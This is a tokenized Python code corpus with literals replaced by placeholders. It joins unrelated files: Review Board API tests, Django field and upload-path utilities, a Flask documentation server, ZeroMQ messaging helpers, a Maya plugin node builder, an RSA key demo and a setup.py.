<EOL> profile = self . user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> expected_url = self . base_url + get_review_group_item_url ( group . name ) <EOL> self . api_get ( <EOL> get_watched_review_group_item_url ( self . user . username , group . pk ) , <EOL> expected_status = <NUM_LIT> , <EOL> expected_headers = { <EOL> '<STR_LIT>' : expected_url , <EOL> } ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_get_with_site ( self ) : <EOL> """<STR_LIT>""" <EOL> user = self . _login_user ( local_site = True ) <EOL> group = self . create_review_group ( with_local_site = True ) <EOL> profile = user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> expected_url = ( <EOL> self . base_url + <EOL> get_review_group_item_url ( group . name , self . local_site_name ) ) <EOL> self . api_get ( <EOL> get_watched_review_group_item_url ( user . username , group . pk , <EOL> self . 
local_site_name ) , <EOL> expected_status = <NUM_LIT> , <EOL> expected_headers = { <EOL> '<STR_LIT>' : expected_url , <EOL> } ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_get_with_site_no_access ( self ) : <EOL> """<STR_LIT>""" <EOL> group = self . create_review_group ( with_local_site = True ) <EOL> profile = self . user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> rsp = self . api_get ( <EOL> get_watched_review_group_item_url ( self . user . username , group . pk , <EOL> self . local_site_name ) , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , PERMISSION_DENIED . code ) </s>
<s> from . test import TestCase <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from django . core . exceptions import ValidationError <EOL> from os import path as fs_path <EOL> from time import strftime <EOL> from django . utils . text import slugify <EOL> from django . utils import six <EOL> from django . utils . translation import ugettext as _ <EOL> from django . core . cache import cache <EOL> from django . conf import settings <EOL> from django . db import models <EOL> from collections import OrderedDict <EOL> try : <EOL> from django . utils . deconstruct import deconstructible <EOL> except ImportError : <EOL> def deconstructible ( old_class ) : <EOL> return old_class <EOL> UPLOAD_TO_OPTIONS = { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT:html>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> @ deconstructible <EOL> class UploadTo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . options = UPLOAD_TO_OPTIONS . copy ( ) <EOL> if hasattr ( settings , "<STR_LIT>" ) : <EOL> self . options . update ( settings . UPLOAD_TO_OPTIONS ) <EOL> self . options . update ( kwargs ) <EOL> @ staticmethod <EOL> def get_file_info ( full_filename ) : <EOL> filename = fs_path . basename ( full_filename ) . lower ( ) <EOL> filename , file_ext = filename . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> return { <EOL> "<STR_LIT:filename>" : filename , <EOL> "<STR_LIT>" : file_ext , <EOL> "<STR_LIT>" : full_filename <EOL> } <EOL> def validate_file_info ( self , file_info ) : <EOL> file_ext = file_info [ "<STR_LIT>" ] <EOL> if file_ext in self . options [ "<STR_LIT>" ] : <EOL> raise ValueError ( "<STR_LIT>" % file_ext ) <EOL> def generate_file_name ( self , instance , file_info ) : <EOL> model_name = instance . __class__ . __name__ <EOL> filename = file_info [ "<STR_LIT:filename>" ] <EOL> max_len = self . 
options [ "<STR_LIT>" ] <EOL> file_info [ "<STR_LIT:filename>" ] = slugify ( filename ) [ : max_len ] <EOL> return strftime ( self . options [ "<STR_LIT>" ] ) . format ( <EOL> model_name = model_name , <EOL> instance = instance , <EOL> ** file_info <EOL> ) <EOL> def __call__ ( self , instance , full_filename ) : <EOL> """<STR_LIT>""" <EOL> full_filename = six . text_type ( full_filename ) <EOL> file_info = self . get_file_info ( full_filename ) <EOL> self . validate_file_info ( file_info ) <EOL> return self . generate_file_name ( instance , file_info ) <EOL> def upload_to ( instance , full_filename ) : <EOL> upload_to_obj = UploadTo ( ) <EOL> return upload_to_obj ( instance , full_filename ) <EOL> def cached_model_property ( model_method = None , readonly = True , cache_timeout = None ) : <EOL> """<STR_LIT>""" <EOL> def func ( f ) : <EOL> def _get_cache_key ( obj ) : <EOL> """<STR_LIT>""" <EOL> model_name = getattr ( obj , "<STR_LIT>" ) . db_table <EOL> method_name = f . __name__ <EOL> return "<STR_LIT>" % ( model_name , obj . pk , method_name ) <EOL> def get_x ( obj ) : <EOL> cache_key = _get_cache_key ( obj ) <EOL> result = cache . get ( cache_key ) <EOL> if result is None : <EOL> result = f ( obj ) <EOL> set_x ( obj , result ) <EOL> return result <EOL> def del_x ( obj ) : <EOL> """<STR_LIT>""" <EOL> cache_key = _get_cache_key ( obj ) <EOL> cache . delete ( cache_key ) <EOL> def set_x ( obj , value ) : <EOL> """<STR_LIT>""" <EOL> cache_key = _get_cache_key ( obj ) <EOL> if cache_timeout is None : <EOL> cache . set ( cache_key , value ) <EOL> else : <EOL> cache . 
set ( cache_key , value , cache_timeout ) <EOL> if readonly : <EOL> return property ( fget = get_x , fdel = del_x ) <EOL> else : <EOL> return property ( fget = get_x , fset = set_x , fdel = del_x ) <EOL> if model_method : <EOL> return func ( model_method ) <EOL> return func <EOL> class Choices ( OrderedDict ) : <EOL> """<STR_LIT>""" <EOL> _read_only = True <EOL> _choices_id = None <EOL> def __init__ ( self , choices , order_by = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . _read_only = False <EOL> super ( Choices , self ) . __init__ ( choices ) <EOL> self . _choices = _choices = [ ] <EOL> self . _order_by = order_by <EOL> if not choices : <EOL> return <EOL> choice_ids = set ( ) <EOL> for choice_code , choice_options in self . items ( ) : <EOL> if not issubclass ( choice_options . __class__ , dict ) : <EOL> choice_options = { "<STR_LIT:id>" : choice_options } <EOL> self [ choice_code ] = choice_options <EOL> choice_id = choice_options [ "<STR_LIT:id>" ] <EOL> choice_ids . add ( choice_id ) <EOL> if "<STR_LIT>" not in choice_options : <EOL> choice_options [ "<STR_LIT>" ] = choice_code . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) . capitalize ( ) <EOL> display = choice_options [ "<STR_LIT>" ] <EOL> _choices . append ( ( choice_id , _ ( display ) ) ) <EOL> if order_by == "<STR_LIT>" : <EOL> _choices . sort ( key = lambda x : x [ <NUM_LIT:1> ] ) <EOL> elif order_by == "<STR_LIT:id>" : <EOL> _choices . sort ( key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> self . _read_only = True <EOL> def get_display_name ( self , choice_id ) : <EOL> """<STR_LIT>""" <EOL> return self . get_value ( choice_id , "<STR_LIT>" ) <EOL> def get_value ( self , choice_id , choice_key , raise_exception = True ) : <EOL> """<STR_LIT>""" <EOL> if self . _choices_id is None : <EOL> self . _choices_id = { item [ "<STR_LIT:id>" ] : ( key , item ) for key , item in six . iteritems ( self ) } <EOL> choice_name , choice = self . 
_choices_id [ choice_id ] <EOL> if choice_key is None : <EOL> return choice_name <EOL> elif raise_exception : <EOL> return choice [ choice_key ] <EOL> else : <EOL> return choice . get ( choice_key ) <EOL> def get_code_name ( self , choice_id ) : <EOL> """<STR_LIT>""" <EOL> return self . get_value ( choice_id , choice_key = None ) <EOL> def __getattr__ ( self , attr_name ) : <EOL> if attr_name in self : <EOL> return self [ attr_name ] [ "<STR_LIT:id>" ] <EOL> raise AttributeError ( "<STR_LIT>" % ( attr_name , self . __class__ . __name__ ) ) <EOL> def __call__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _choices <EOL> def __setattr__ ( self , attr , * args ) : <EOL> if self . _read_only and attr in self : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> super ( Choices , self ) . __setattr__ ( attr , * args ) <EOL> def __setitem__ ( self , * args ) : <EOL> if self . _read_only : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> super ( Choices , self ) . __setitem__ ( * args ) <EOL> def __dir__ ( self ) : <EOL> return list ( self . keys ( ) ) + dir ( self . __class__ ) <EOL> def copy ( self ) : <EOL> new_self = Choices ( { } , order_by = self . _order_by ) <EOL> new_self . update ( self ) <EOL> return new_self <EOL> def update ( self , new_data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _read_only : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not new_data : <EOL> new_data = kwargs <EOL> if not isinstance ( new_data , Choices ) : <EOL> new_data = Choices ( new_data ) <EOL> assert isinstance ( new_data , Choices ) <EOL> common_keys = set ( new_data . keys ( ) ) & set ( self . keys ( ) ) <EOL> if common_keys : <EOL> raise ValueError ( "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( common_keys ) ) <EOL> self . _choices += ( new_data ( ) ) <EOL> self . _choices_id = None <EOL> super ( Choices , self ) . update ( new_data ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , * args , ** kwargs ) : <EOL> self . 
_read_only = True <EOL> def __add__ ( self , other ) : <EOL> self . _read_only = False <EOL> with self . copy ( ) as result : <EOL> result . update ( other ) <EOL> self . _read_only = True <EOL> return result <EOL> class KeyValueContainer ( dict ) : <EOL> def __init__ ( self , seq = None , separator = "<STR_LIT:=>" , ** kwargs ) : <EOL> super ( KeyValueContainer , self ) . __init__ ( ) <EOL> self . sep = separator <EOL> if isinstance ( seq , six . string_types ) : <EOL> seq = self . _parse_string ( seq ) <EOL> if seq is not None : <EOL> seq = dict ( seq ) <EOL> kwargs . update ( seq ) <EOL> for key , value in six . iteritems ( kwargs ) : <EOL> self . __setitem__ ( key , value ) <EOL> def __str__ ( self ) : <EOL> result = [ ] <EOL> for key , val in six . iteritems ( self ) : <EOL> result . append ( u"<STR_LIT>" % ( key , self . sep , val ) ) <EOL> return u"<STR_LIT:\n>" . join ( result ) + "<STR_LIT:\n>" <EOL> def __setitem__ ( self , key , item ) : <EOL> if item is None : <EOL> item = "<STR_LIT>" <EOL> else : <EOL> item = six . text_type ( item ) <EOL> super ( KeyValueContainer , self ) . __setitem__ ( key , item ) <EOL> def __unicode__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def _parse_string ( self , value ) : <EOL> result = { } <EOL> if not value : <EOL> return result <EOL> for line in value . split ( "<STR_LIT:\n>" ) : <EOL> line = line . strip ( ) <EOL> if not line : <EOL> continue <EOL> if self . sep not in line : <EOL> raise ValueError ( _ ( "<STR_LIT>" ) % ( repr ( line ) , self . sep ) ) <EOL> key , value = [ val . strip ( ) for val in line . split ( self . sep , <NUM_LIT:1> ) ] <EOL> result [ key ] = value <EOL> return result <EOL> class KeyValueField ( models . TextField ) : <EOL> """<STR_LIT>""" <EOL> description = _ ( "<STR_LIT>" ) <EOL> empty_values = ( None , ) <EOL> def __init__ ( self , separator = "<STR_LIT:=>" , * args , ** kwargs ) : <EOL> self . separator = separator <EOL> super ( KeyValueField , self ) . 
__init__ ( * args , ** kwargs ) <EOL> def contribute_to_class ( self , cls , name , ** kwargs ) : <EOL> super ( KeyValueField , self ) . contribute_to_class ( cls , name , ** kwargs ) <EOL> setattr ( cls , name , property ( fget = self . get_value , fset = self . set_value ) ) <EOL> def set_value ( self , obj , value ) : <EOL> if isinstance ( value , six . string_types ) : <EOL> value = self . from_db_value ( value ) <EOL> elif not isinstance ( value , KeyValueContainer ) : <EOL> value = KeyValueContainer ( value ) <EOL> obj . __dict__ [ self . name ] = value <EOL> def get_value ( self , obj ) : <EOL> return obj . __dict__ [ self . name ] <EOL> def from_db_value ( self , value , * args , ** kwargs ) : <EOL> try : <EOL> return KeyValueContainer ( value , separator = self . separator ) <EOL> except ValueError as e : <EOL> raise ValidationError ( e ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return "<STR_LIT>" <EOL> return six . text_type ( value ) <EOL> def deconstruct ( self ) : <EOL> name , path , args , kwargs = super ( KeyValueField , self ) . deconstruct ( ) <EOL> if self . separator != "<STR_LIT:=>" : <EOL> kwargs [ "<STR_LIT>" ] = self . separator <EOL> return name , path , args , kwargs </s>
<s> import time <EOL> from watchdog . events import PatternMatchingEventHandler <EOL> class CallbackModifiedHandler ( PatternMatchingEventHandler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , callback , * args , ** kwargs ) : <EOL> self . callback = callback <EOL> self . repeat_delay = kwargs . pop ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> self . last_fired_time = <NUM_LIT:0> <EOL> super ( CallbackModifiedHandler , self ) . __init__ ( * args , ** kwargs ) <EOL> def on_modified ( self , event ) : <EOL> super ( CallbackModifiedHandler , self ) . on_modified ( event ) <EOL> now = time . time ( ) <EOL> if self . last_fired_time + self . repeat_delay < now : <EOL> if not event . is_directory : <EOL> self . last_fired_time = now <EOL> self . callback ( ) </s>
<s> import rsa <EOL> def create_key ( ) : <EOL> ( pubkey , privkey ) = rsa . newkeys ( <NUM_LIT> ) <EOL> pub = pubkey . save_pkcs1 ( ) <EOL> pubfile = open ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> pubfile . write ( pub ) <EOL> pubfile . close ( ) <EOL> pri = privkey . save_pkcs1 ( ) <EOL> prifile = open ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> prifile . write ( pri ) <EOL> prifile . close ( ) <EOL> def load_public ( ) : <EOL> with open ( '<STR_LIT>' ) as publickfile : <EOL> p = publickfile . read ( ) <EOL> pubkey = rsa . PublicKey . load_pkcs1 ( p ) <EOL> return pubkey <EOL> def load_private ( ) : <EOL> with open ( '<STR_LIT>' ) as privatefile : <EOL> p = privatefile . read ( ) <EOL> privkey = rsa . PrivateKey . load_pkcs1 ( p ) <EOL> return privkey <EOL> def encrypt ( message ) : <EOL> crypto = rsa . encrypt ( message , pubkey ) <EOL> return crypto <EOL> def decrypt ( crypto ) : <EOL> message = rsa . decrypt ( crypto , privkey ) <EOL> return message <EOL> pubkey = load_public ( ) <EOL> privkey = load_private ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> message = '<STR_LIT:hello>' <EOL> en_str = encrypt ( message ) <EOL> print en_str <EOL> print decrypt ( en_str ) </s>
<s> import mock <EOL> from dccautomation import compat , common , inproc <EOL> class DefaultPortTests ( compat . unittest . TestCase ) : <EOL> def test_default ( self ) : <EOL> self . assertEqual ( inproc . get_default_port ( ) , inproc . DEFAULT_INPROC_PORT ) <EOL> def test_non_default ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , { common . ENV_INPROC_PORT : '<STR_LIT>' } ) : <EOL> self . assertEqual ( inproc . get_default_port ( ) , <NUM_LIT:20> ) </s>
<s> import os <EOL> from flask import abort , Flask , jsonify , redirect , render_template , request <EOL> from . filekeeper import delete_files , insert_link_to_latest , parse_docfiles , unpack_project <EOL> from . import getconfig <EOL> app = Flask ( __name__ ) <EOL> app . config [ '<STR_LIT>' ] = getconfig . max_content_mb * <NUM_LIT> * <NUM_LIT> <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' , '<STR_LIT>' ] ) <EOL> def hmfd ( ) : <EOL> if getconfig . readonly : <EOL> return abort ( <NUM_LIT> ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> if not request . files : <EOL> return abort ( <NUM_LIT> , '<STR_LIT>' ) <EOL> unpack_project ( <EOL> request . files . values ( ) [ <NUM_LIT:0> ] . stream , <EOL> request . form , <EOL> getconfig . docfiles_dir ) <EOL> else : <EOL> assert request . method == '<STR_LIT>' <EOL> delete_files ( <EOL> request . args [ '<STR_LIT:name>' ] , <EOL> request . args . get ( '<STR_LIT:version>' ) , <EOL> getconfig . docfiles_dir , <EOL> request . args . get ( '<STR_LIT>' ) ) <EOL> return jsonify ( { '<STR_LIT:success>' : True } ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def home ( ) : <EOL> projects = parse_docfiles ( getconfig . docfiles_dir , getconfig . docfiles_link_root ) <EOL> insert_link_to_latest ( projects , '<STR_LIT>' ) <EOL> return render_template ( '<STR_LIT>' , projects = projects , ** getconfig . renderables ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def latest_root ( project ) : <EOL> return latest ( project , '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def latest ( project , path ) : <EOL> parsed_docfiles = parse_docfiles ( getconfig . docfiles_dir , getconfig . 
docfiles_link_root ) <EOL> proj_for_name = dict ( ( p [ '<STR_LIT:name>' ] , p ) for p in parsed_docfiles ) <EOL> if project not in proj_for_name : <EOL> return '<STR_LIT>' % project , <NUM_LIT> <EOL> latestindex = proj_for_name [ project ] [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> if path : <EOL> latestlink = '<STR_LIT>' % ( os . path . dirname ( latestindex ) , path ) <EOL> else : <EOL> latestlink = latestindex <EOL> return redirect ( latestlink ) </s>
<s> """<STR_LIT>""" <EOL> from hierarchyconvertermaya_5 import * </s>
<s> import json <EOL> import zmq <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> def runserver ( handshake_port ) : <EOL> sock = zmq . Context ( ) . socket ( zmq . REP ) <EOL> appport = sock . bind_to_random_port ( '<STR_LIT>' ) <EOL> log . info ( '<STR_LIT>' , <EOL> handshake_port , appport ) <EOL> log . info ( '<STR_LIT>' ) <EOL> while True : <EOL> recved = json . loads ( sock . recv ( ) ) <EOL> log . debug ( '<STR_LIT>' , recved ) <EOL> log . debug ( '<STR_LIT>' , tosend ) <EOL> sock . send ( json . dumps ( tosend ) ) </s>
<s> from maya import OpenMaya , OpenMayaMPx <EOL> class AttrSpec ( object ) : <EOL> def createfnattr ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> raise NotImplementedError ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> raise NotImplementedError ( ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> raise NotImplementedError ( ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> raise NotImplementedError ( ) <EOL> def allow_fields ( self ) : <EOL> return False <EOL> class _FloatAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnNumericAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asFloat ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . setFloat ( value ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . create ( <EOL> longname , shortname , OpenMaya . MFnNumericData . kFloat ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( value ) <EOL> A_FLOAT = _FloatAttr ( ) <EOL> class _StringAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnTypedAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asString ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . setString ( value ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . create ( longname , shortname , <EOL> OpenMaya . MFnData . kString ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( OpenMaya . MFnStringData ( ) . create ( value ) ) <EOL> A_STRING = _StringAttr ( ) <EOL> class _EnumAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnEnumAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asInt ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . 
setInt ( value ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . create ( longname , shortname ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( value ) <EOL> def allow_fields ( self ) : <EOL> return True <EOL> A_ENUM = _EnumAttr ( ) <EOL> class _ColorAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnNumericAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asFloatVector ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . setMFloatVector ( OpenMaya . MFloatVector ( * value ) ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . createColor ( longname , shortname ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( * value ) <EOL> A_COLOR = _ColorAttr ( ) <EOL> class NodeSpec ( object ) : <EOL> def nodebase ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def register ( self , fnplugin , typename , typeid , create , init ) : <EOL> raise NotImplementedError ( ) <EOL> def deregister ( self , fnplugin , typeid ) : <EOL> raise NotImplementedError ( ) <EOL> class _DependsNode ( NodeSpec ) : <EOL> def nodebase ( self ) : <EOL> return ( OpenMayaMPx . MPxNode , ) <EOL> def register ( self , fnplugin , typename , typeid , create , init ) : <EOL> fnplugin . registerNode ( <EOL> typename , typeid , create , init , <EOL> OpenMayaMPx . MPxNode . kDependNode ) <EOL> def deregister ( self , fnplugin , typeid ) : <EOL> fnplugin . deregisterNode ( typeid ) <EOL> NT_DEPENDSNODE = _DependsNode ( ) <EOL> class _TransformNode ( NodeSpec ) : <EOL> xform_typeid = OpenMaya . MTypeId ( <NUM_LIT> ) <EOL> class TransformMatrix ( OpenMayaMPx . MPxTransformationMatrix ) : <EOL> pass <EOL> def nodebase ( self ) : <EOL> return ( OpenMayaMPx . MPxTransform , ) <EOL> def _make_node_matrix ( self ) : <EOL> return OpenMayaMPx . 
asMPxPtr ( TransformMatrix ( ) ) <EOL> def register ( self , fnplugin , typename , typeid , create , init ) : <EOL> fnplugin . registerTransform ( <EOL> typename , typeid , create , init , <EOL> self . _make_node_matrix , self . xform_typeid ) <EOL> def deregister ( self , fnplugin , typeid ) : <EOL> fnplugin . deregisterNode ( typeid ) <EOL> NT_TRANSFORMNODE = _TransformNode ( ) <EOL> def create_attrmaker ( <EOL> attrspec , ln , sn , affectors = ( ) , default = None , <EOL> transformer = None , fields = ( ) ) : <EOL> if not attrspec . allow_fields ( ) and fields : <EOL> raise RuntimeError ( <EOL> '<STR_LIT>' % attrspec ) <EOL> def createattr ( nodeclass ) : <EOL> fnattr = attrspec . createfnattr ( ) <EOL> attrobj = attrspec . create ( fnattr , ln , sn ) <EOL> for name , value in fields : <EOL> fnattr . addField ( name , value ) <EOL> if default is not None : <EOL> attrspec . setdefault ( fnattr , default ) <EOL> isinput = not bool ( affectors ) <EOL> fnattr . setWritable ( isinput ) <EOL> fnattr . setStorable ( isinput ) <EOL> if not isinput and transformer is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> nodeclass . addAttribute ( attrobj ) <EOL> setattr ( nodeclass , ln , attrobj ) <EOL> for affectedby in affectors : <EOL> inputplug = getattr ( nodeclass , affectedby ) <EOL> nodeclass . attributeAffects ( inputplug , attrobj ) <EOL> return ln , attrspec , transformer , affectors <EOL> return createattr <EOL> def float_input ( ln , sn , ** kwargs ) : <EOL> return create_attrmaker ( A_FLOAT , ln , sn , ** kwargs ) <EOL> def float_output ( ln , sn , ** kwargs ) : <EOL> return create_attrmaker ( A_FLOAT , ln , sn , ** kwargs ) <EOL> def create_node ( nodespec , name , typeid , attrmakers ) : <EOL> attr_to_spec = { } <EOL> outattr_to_xformdata = { } <EOL> def compute ( mnode , plug , datablock ) : <EOL> attrname = plug . name ( ) . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> xformdata = outattr_to_xformdata . 
get ( attrname ) <EOL> if xformdata is None : <EOL> return OpenMaya . MStatus . kUnknownParameter <EOL> xformer , affectors = xformdata <EOL> invals = [ ] <EOL> for inname in affectors : <EOL> inplug = getattr ( nodetype , inname ) <EOL> indata = datablock . inputValue ( inplug ) <EOL> inval = attr_to_spec [ inname ] . getvalue ( indata ) <EOL> invals . append ( inval ) <EOL> outval = xformer ( * invals ) <EOL> outhandle = datablock . outputValue ( plug ) <EOL> attr_to_spec [ attrname ] . setvalue ( outhandle , outval ) <EOL> datablock . setClean ( plug ) <EOL> methods = { '<STR_LIT>' : compute } <EOL> nodetype = type ( name , nodespec . nodebase ( ) , methods ) <EOL> mtypeid = OpenMaya . MTypeId ( typeid ) <EOL> def creator ( ) : <EOL> return OpenMayaMPx . asMPxPtr ( nodetype ( ) ) <EOL> def init ( ) : <EOL> for makeattr in attrmakers : <EOL> ln , attrspec , xformer , affectors = makeattr ( nodetype ) <EOL> attr_to_spec [ ln ] = attrspec <EOL> if xformer is not None : <EOL> outattr_to_xformdata [ ln ] = xformer , affectors <EOL> def register ( plugin ) : <EOL> nodespec . register ( plugin , name , mtypeid , creator , init ) <EOL> def deregister ( plugin ) : <EOL> nodespec . deregister ( plugin , mtypeid ) <EOL> return register , deregister </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import threading <EOL> import struct <EOL> import atexit <EOL> import zmq <EOL> import msgpack <EOL> from . import utils <EOL> log = logging . getLogger ( __name__ ) <EOL> MAX_QUEUED_MESSAGES = <NUM_LIT> <EOL> LINGER_SHUTDOWN_MSECS = <NUM_LIT> <EOL> META_STRUCT_FMT = "<STR_LIT>" <EOL> META_STRUCT_VERSION = <NUM_LIT> <EOL> def check_meta_version ( meta ) : <EOL> value , = struct . unpack ( "<STR_LIT>" , meta [ <NUM_LIT:0> ] ) <EOL> if value != META_STRUCT_VERSION : <EOL> raise ValueError ( value ) <EOL> threadLocal = threading . local ( ) <EOL> _zmq_context = None <EOL> _connect_str = None <EOL> def init ( host , port ) : <EOL> global _zmq_context <EOL> global _connect_str <EOL> _zmq_context = zmq . Context ( ) <EOL> _connect_str = "<STR_LIT>" % ( host , port ) <EOL> def _thread_connect ( ) : <EOL> if _zmq_context and not getattr ( threadLocal , '<STR_LIT>' , None ) : <EOL> threadLocal . zmq_socket = _zmq_context . socket ( zmq . PUSH ) <EOL> threadLocal . zmq_socket . hwm = MAX_QUEUED_MESSAGES <EOL> threadLocal . zmq_socket . linger = LINGER_SHUTDOWN_MSECS <EOL> threadLocal . zmq_socket . connect ( _connect_str ) <EOL> def _serialize_context ( context ) : <EOL> context_dict = context . to_dict ( ) <EOL> for key in ( '<STR_LIT:host>' , '<STR_LIT:type>' ) : <EOL> if len ( context_dict . get ( key , "<STR_LIT>" ) ) > <NUM_LIT:64> : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> meta_data = struct . pack ( META_STRUCT_FMT , META_STRUCT_VERSION , <EOL> context_dict [ '<STR_LIT:end>' ] , context_dict [ '<STR_LIT:host>' ] , <EOL> context_dict [ '<STR_LIT:type>' ] ) <EOL> try : <EOL> context_data = msgpack . packb ( context_dict ) <EOL> except TypeError : <EOL> try : <EOL> context_data = msgpack . packb ( context_dict , <EOL> default = utils . msgpack_encode_default ) <EOL> except TypeError : <EOL> log . exception ( "<STR_LIT>" ) <EOL> context_dict [ '<STR_LIT:body>' ] = None <EOL> context_data = msgpack . 
packb ( context_dict ) <EOL> return meta_data , context_data <EOL> def send ( context ) : <EOL> global _zmq_context <EOL> _thread_connect ( ) <EOL> try : <EOL> meta_data , context_data = _serialize_context ( context ) <EOL> except Exception : <EOL> log . exception ( "<STR_LIT>" ) <EOL> return <EOL> if _zmq_context and threadLocal . zmq_socket is not None : <EOL> try : <EOL> log . debug ( "<STR_LIT>" ) <EOL> threadLocal . zmq_socket . send_multipart ( <EOL> ( meta_data , context_data ) , zmq . NOBLOCK ) <EOL> except zmq . ZMQError , e : <EOL> log . exception ( "<STR_LIT>" ) <EOL> else : <EOL> log . info ( "<STR_LIT>" , context . name ) <EOL> def close ( ) : <EOL> global _zmq_context <EOL> if getattr ( threadLocal , '<STR_LIT>' , None ) : <EOL> threadLocal . zmq_socket . close ( ) <EOL> threadLocal . zmq_socket = None <EOL> _zmq_context = None <EOL> atexit . register ( close ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> os . system ( '<STR_LIT>' ) <EOL> sys . exit ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> license = open ( '<STR_LIT>' ) . read ( ) , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
